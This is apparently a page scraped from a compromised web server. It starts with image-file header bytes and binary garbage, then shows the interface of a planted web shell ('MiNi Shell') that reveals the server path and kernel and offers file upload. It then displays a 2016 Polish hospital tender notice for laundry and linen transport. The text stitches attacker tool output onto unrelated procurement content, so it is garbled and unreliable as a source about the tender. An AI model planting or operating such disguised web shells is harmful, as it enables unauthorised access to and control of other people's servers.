JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160511/117164-N-2016.html

<p class="kh_header"><b>Dzierżoniów: PRANIE BIELIZNY SZPITALNEJ WRAZ Z TRANSPORTEM</b><br>
<b>Numer ogłoszenia: 117164 - 2016; data zamieszczenia: 11.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> NZOZ Szpital Powiatowy w Dzierżoniowie sp. z o. o. , ul. Cicha 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 8344168, faks 74 8344179.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRANIE BIELIZNY SZPITALNEJ WRAZ Z TRANSPORTEM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości i zakresu zamówienia: 
Przedmiotem zamówienia jest usługa polegająca na, wykonaniu kompleksowych usług pralniczych wraz 
z naprawą i transportem bielizny - odbiór i dostawa 6  dni w tygodniu;
- od poniedziałku do piątku w godzinach od 8:00- 12:00,  
- w soboty w godzinach od 8:00- 10:00. 
W przypadku kumulacji dni wolnych lub świątecznych  co najmniej 3 kolejne dni, odbiór i dostawa 
w drugim dniu wolnym od pracy w godzinach od 8:00- 10:00. 
Opis szczegółowy:
-Pranie i maglowanie bielizny szpitalnej i innej (ZOL) wraz z transportem  - poszwy, poszewki, prześcieradła, serwety, pidżamy, koszule, firany, worki brezentowe do pakowania bielizny, odzież robocza i inna (ZOL)
-pranie poduszek, kołder i mopów,
-pranie rolet materiałowych  i żaluzji pionowych, 
-pranie i prasowanie fartuchów i mundurków personelu, 
-pranie materacy, kocy i plecaków RM, 
-bieżące cerowanie /łatanie, 
Wykonawca powinien oddzielić rzeczy uszkodzone i naprawić je tzn. przeszyć na maszynie szwem ciągłym, naprawić szwy boczne, zszyć rozdarte części bielizny, wszyć suwak, gumki uzupełnić troki, napy 
i guziki itp. ponosząc koszty potrzebnych użytych materiałów.
Zamawiający nie przyjmie prania, które nie będzie spełniało wymogów jakościowych - czyste, suche, złożone, wyprasowane, usztywnione, naprawione, odpowiednio zapakowane. 
W przypadku zakwestionowania partii prania, Zamawiający nie będzie ponosił kosztów związanych 
z powtórnym praniem, koszty te obciążać będą Wykonawcę w ramach reklamacji. Zakwestionowana partia prania winna być udokumentowana przez pracownika Zamawiającego jak i pracownika Wykonawcy
(na druku Reklamacja, dostarczonym przez Wykonawcę).
                  
A. Odbiór brudnej bielizny i dostawa czystej bielizny; 
-pracownicy oddziałów Szpitalnych w Bielawie zdają brudną bieliznę Wykonawcy i odbierają czystą bieliznę od Wykonawcy, w pomieszczeniach wydawania i przyjmowania bielizny zlokalizowanych w budynku Szpitala w Bielawie.
-pracownicy oddziałów Szpitalnych w Dzierżoniowie zdają brudną bieliznę i odbierają czystą bieliznę w magazynie wymiennym, pracownik magazynu wymiennego zdaje brudną bezpośrednio Wykonawcy 
i odbiera czystą bieliznę bezpośrednio od Wykonawcy w pomieszczeniach magazynu wymiennego.
OPIS 
1.)	Odbiór brudnej bielizny przez Wykonawcę (z pisemnym potwierdzeniem z wyszczególnieniem asortymentowo ilościowym i ilością kg- na druku dostarczonym przez wykonawcę). W skali 12 miesięcy w ilości około: 70 927 kg bielizny brudnej w momencie zdania do pralni, w następujących rodzajach:
a.	bielizna pościelowa z oddziałów Szpitalnych, 
b.	bielizna i odzież operacyjna,
c.	bielizna skażona,
d.	bielizna dzieci młodszych, noworodków- tylko pranie i prasownie (pranie w wydzielonej pralnicy)
e.	odzież ochronna personelu medycznego,
f.	odzież robocza, w tym mundurki personelu (wymaga się prasowania ręcznego żelazkiem 
lub parowego wypranej bielizny fasonowej (m.in. mundury personelu), nie dopuszcza się maglowania,
g.	ręczniki, ścierki, obrusy, 
h.	pidżamy, podomki,
i.	koce, (wymaga się w ostatnim cyklu prania zastosowania środków zmiękczających 
i antystatycznych),
j.	kołdry, poduszki, zasłony parawanowe, materace, pokrowce, 
k.	ścierki i mopy do sprzątania,
l.	rolety materiałowe, żaluzje pionowe.
		
2.)	Zdawanie brudnej bielizny:
-worki i oznakowanie zapakowanej brudnej bielizny do transportu zapewnia Wykonawca,
-druki przekazania bielizny do pralni dostarcza Wykonawca,
-druki przekazania bielizny do pralni podpisują: osoba przekazująca ze strony Zamawiającego 
i odbierająca ze strony Wykonawcy. 
a.  	Bielizna i pościel będzie pakowana do worków foliowych koloru niebieskiego i zabezpieczona workiem  brezentowym lub  dodatkowym foliowym- przekazanie na podstawie wagi 
i załączonego spisu z wyszczególnieniem asortymentowym i ilościowym jego zawartości.
Zamawiający dopuszcza liczenie bielizny szpitalnej w momencie odbioru przez Wykonawcę 
w obecności pracownika Szpitala. Utylizacja worków jednorazowych w których przekazywana jest bielizna brudna pozostaje po stronie Wykonawcy. 
b. 	Bielizna i pościel skażona, pakowana będzie osobno do worków foliowych typu Hydro- bag, zabezpieczona dodatkowo w worek foliowy koloru niebieskiego, widocznie oznakowana -bielizna skażona - asortyment znajdujący się w tych workach nie będzie liczony - przekazanie 
na podstawie wagi. Utylizacja worków jednorazowych w których przekazywana jest bielizna brudna pozostaje po stronie Wykonawcy. 
3.)	Czysta bielizna oddawana będzie przez Wykonawcę do magazynów w podwójnym opakowaniu
w workach brezentowych i na nich nałożonych jednorazowych workach foliowych koloru białego. Bielizna  i inny asortyment powinny być posegregowana wg oddziałów/ komórek i wg asortymentu
z pisemnym potwierdzeniem z wyszczególnieniem asortymentowo ilościowym jego zawartości na drukach przekazania Wykonawcy, podpisanych przez osobę przekazującą ze strony Wykonawcy i odbierającą ze strony Zamawiającego. 
-Bielizna wilgotna podlega natychmiastowemu zwrotowi. Wykonawca zobowiązany będzie
do dostarczenia takiej samej ilości i tego samego rodzaju bielizny suchej.

4.)	Czas świadczenia usługi od momentu przekazania:
a.	fartuchy, mundurki personelu - zwrot w ciągu 48 godzin,
b.	bielizna operacyjna fartuchy - zwrot w ciągu 24 godzin,
c.	pozostała bielizna - zwrot w ciągu 48 godzin lub zgodnie z uzgodnieniami w trakcie trwania umowy (uzgodnienia na piśmie)
d.	materace, plecaki - zwrot w ciągu 120 godzin,
e.	pranie ekspresowe tego samego dnia do 8 godzin,
f.	bielizna poddana naprawie podlega zwrotowi w ciągu 96 godzin od momentu przekazania 
do naprawy,
Uwaga 
- bielizna noworodkowa i bielizna bloku operacyjnego winna być pakowana osobno do worków (na terenie pralni)

5.)	Wykonawca ponosi ryzyko związane z odkupieniem bielizny ( o tych samych parametrach
technicznych) w przypadku zniszczenia w trakcie wykonywania usługi oraz w przypadku
zagubienia, trwałego zafarbowania itp.
6.)	Wykonawca ma obowiązek posiadania i stosowania opracowanej procedury procesu prania oraz 
na żądanie Zamawiającego ma obowiązek poddać się kontroli zgodności jej wykonywania w procesie
	prania,
7.)	Do prania bielizny dzieci młodszych ma być wydzielona osobna pralnica.
8.)	Zamawiający zastrzega sobie prawo kontroli Wykonawcy w sytuacjach uzasadnionych zagrożeniem  
mikrobiologicznym (w szczególności - badania czystości mikrobiologicznej w pralni przez Zamawiającego na koszt Wykonawcy).
9.)	W przypadku dochodzenia epidemiologicznego w szpitalu, Wykonawca, będzie zobowiązany 
do dostarczenia dokumentacji potwierdzającej prawidłowość prania i dezynfekcji bielizny szpitalnej oraz do przedstawienia listy zastosowanych środków  piorących i dezynfekcyjnych
10.)	Zamawiający ma prawo do kontroli warunków, w których wykonywana jest usługa. Wyniki kontroli 
mają wpływ na ewentualne odstąpienie od umowy z żądaniem przez Zamawiającego odszkodowania
z tego tytułu.
11.)	Środki piorące, piorąco - dezynfekcyjne, dezynfekcyjne muszą być przechowywane w oryginalnych opakowaniach
12.)	Wszystkie środki do prania i dezynfekcji muszą mieć zastosowanie do prania w pralnicach. 

B. Naprawa bielizny;
OPIS 
1)	Wykonawca zapewnia naprawy bielizny na bieżąco, do napraw bielizny uszkodzonej Wykonawca stosuje własne środki i materiał o takich samych parametrach technicznych, jak bielizna uszkodzona będąca własnością Zamawiającego.
Uwaga:
Przez naprawę rozumie się cerowanie dziur i rozerwań, których powierzchnia nie przekracza 15%    powierzchni asortymentu.
Wykonawca powinien oddzielić rzeczy uszkodzone i naprawić je tzn. przeszyć na maszynie szwem ciągłym, naprawić szwy boczne, zszyć rozdarte części bielizny, wszyć suwak, gumki uzupełnić troki, napy i guziki itp. ponosząc koszty potrzebnych użytych materiałów.
Bielizna nie podlegająca naprawie zostanie przekazana Zamawiającemu, jako bielizna do kasacji.
Kasacja dokonywana będzie na wniosek Wykonawcy przez Komisję Zamawiającego, która wcześniej określi zasadność kasacji.

C. 	Transport bielizny szpitalnej;
OPIS 
1.)	Odbiór i dostawa bielizny transportem i na koszt Wykonawcy. Wykonawca zapewnia transport, czynności załadunkowe i wyładunkowe brudnej i czystej bielizny zgodnie z obowiązującymi przepisami. 
 - 	Transport z magazynu zdawania brudnej bielizny w Dzierżoniowie i pomieszczenia wydawania 
w Bielawie do pralni przez 6 dni w tygodniu codziennie od poniedziałku do piątku w godzinach 
od 8:00-12:00 i w soboty w godzinach od 8:00- 10:00. W przypadku kumulacji dni wolnych lub świątecznych przez co najmniej 3 kolejne dni, odbiór w drugim dniu wolnym od pracy w godzinach od 8:00- 10:00.
 -	Transport z pralni do magazynu wymiennego w Dzierżoniowie i pomieszczenia przyjmowania w Bielawie przez 6 dni w tygodniu codziennie od poniedziałku do piątku w godzinach od 8:00-12:00 
i w soboty w godzinach od 8:00- 10:00. W przypadku kumulacji dni wolnych lub świątecznych przez co najmniej 3 kolejne dni, dostawa w drugim dniu wolnym od pracy w godzinach od 8:00- 10:00.
2.)	Wykonawca zobowiązany jest do stosowania środków ochrony osobistej w trakcie odbioru brudnej bielizny od Zamawiającego (środki ochronne po stronie Wykonawcy)
3.)	Wykonawca zobowiązany jest do codziennej dezynfekcji skrzyni załadunkowej pojazdu/ów oraz prowadzenia książki dezynfekcji środka transportu. Na wniosek Zamawiającego Wykonawca zobowiązany jest każdorazowo udostępnić książkę   dezynfekcji środka transportu, którym przewożona jest bielizna (bez uprzedzenia o kontroli).
4.)	Przewóz bielizny czystej i brudnej musi odbywać się w sposób umożliwiający całkowite odizolowanie bielizny czystej od brudnej (być ściśle wyizolowane, trwale oznakowane i nie może podlegać zamianie) na przykład:
a.	dwoma samochodami, przeznaczonymi jeden do przewozu bielizny czystej, drugi do przewozu bielizny brudnej;
b.	w samochodzie z wydzielonymi oznakowanymi komorami, odizolowanymi od siebie, 
c.	samochodem z częścią bagażową do przewozu bielizny czystej i przyczepą o nadwoziu zamkniętym do przewozu bielizny brudnej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4, 60.10.00.00-9, 50.83.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości; 4 500,00 złotych
słownie: cztery tysiące pięćset złotych 00/100
Wadium może być wniesione w formach określonych w art. 45 ust 6 ustawy PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna warunek za spełniony, jeżeli:
 1.) Wykonawca dołączy do oferty oświadczenie (załącznik nr 3 do SIWZ) Ocena wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Zamawiający uzna warunek za spełniony, jeżeli; 
1) Wykonawca dołączy do oferty oświadczenie ( załącznik nr 3 do SIWZ) 
2) Wykonawca wykaże (załącznik nr 5 do SIWZ); że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej jedną usługę, o wartości brutto nie mniejszej niż 1/4 wartość składanej oferty, z podaniem wartości, dat wykonania i podmiotów, na rzecz, których usługa została wykonana oraz z załączeniem dowodów, o których mowa w rozporządzeniu, że usługa została wykonana lub jest wykonywana należycie (dowodem tym jest m.in. poświadczenie) (w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert); W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których mowa. W razie konieczności, szczególnie, gdy wykaz lub dowody, o których mowa odpowiednio budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. Ocena wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Zamawiający uzna warunek za spełniony, jeżeli; 
1.) Wykonawca dołączy do oferty oświadczenie (załącznik nr 3 do SIWZ) Ocena wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Zamawiający uzna warunek za spełniony, jeżeli;
 1.) Wykonawca dołączy do oferty oświadczenie (załącznik nr 3 do SIWZ) Ocena wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4. Zamawiający uzna warunek za spełniony, jeżeli; 
1.) Wykonawca dołączy do oferty oświadczenie (załącznik nr 3 do SIWZ) Ocena wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">10. Oświadczenie dotyczące przedmiotu Zamówienia - załącznik nr 7.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>11. Formularz ofertowy- (wg załączonego druku - wzór) załącznik nr 1 wypełniony i podpisany przez wykonawcę wraz z załącznikiem nr 1 A (opis przedmiotu zamówienia - formularz cenowy) wypełnionym i podpisanym przez wykonawcę.
12. Pełnomocnictwo, (jeśli dotyczy) - wyłącznie w formie oryginału lub kopii poświadczonej notarialnie: -W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru albo aktualnym zaświadczeniu o wpisie do ewidencji działalności gospodarczej - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy, -W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp). 
13. Projekt Umowy podpisany przez wykonawcę - parafowana każda strona (załącznik nr 2 do SIWZ) 
14. Potwierdzenie wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatnosci - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony dopuszczają możliwość zmiany umowy zawartej w wyniku przeprowadzenia postępowania w następujących przypadkach:
1.)	ustawowej zmiany stawki VAT, zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna.
2.)	zmiany danych adresowych wskazanych w nagłówku umowy Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w ww. zakresie,
3.)	zmiany danych osób reprezentujących strony umowy Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w ww. zakresie.
4.)	zmiana ta jest korzystna dla Zamawiającego,
5.)	konieczność wprowadzenia zmian wyniknie z okoliczności obiektywnych, których nie można było przewidzieć w chwili zawarcia umowy, niezależnych od woli stron, bez względu na to czy ich skutki są korzystne dla Zamawiającego,
6.)	strony umowy uznają zasadność wprowadzenia zmian do umowy, a zmiany te nie wywołają niekorzystnych skutków dla Zamawiającego i nie spowodują zmiany oferowanych warunków realizacji zamówienia będących podstawą oceny ofert.
2.	Wszystkie ww. zmiany wymagają formy pisemnej pod rygorem nieważności.
3.	Zamawiającemu przysługuje prawo do odstąpienia od umowy w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. Odstąpienie od umowy w tym przypadku może nastąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach.  W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.
4.	Zamawiającemu przysługuje prawo do natychmiastowego rozwiązania niniejszej umowy w przypadku rażącego naruszenia warunków umowy, a w szczególności:
1.)	w razie stwierdzenia nierzetelności w wykonywaniu obowiązków określonych niniejszą umową,
2.)	w razie poniesienia szkody z powodu niezachowania należytej staranności przy wykonywaniu obowiązków określonych niniejszą umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
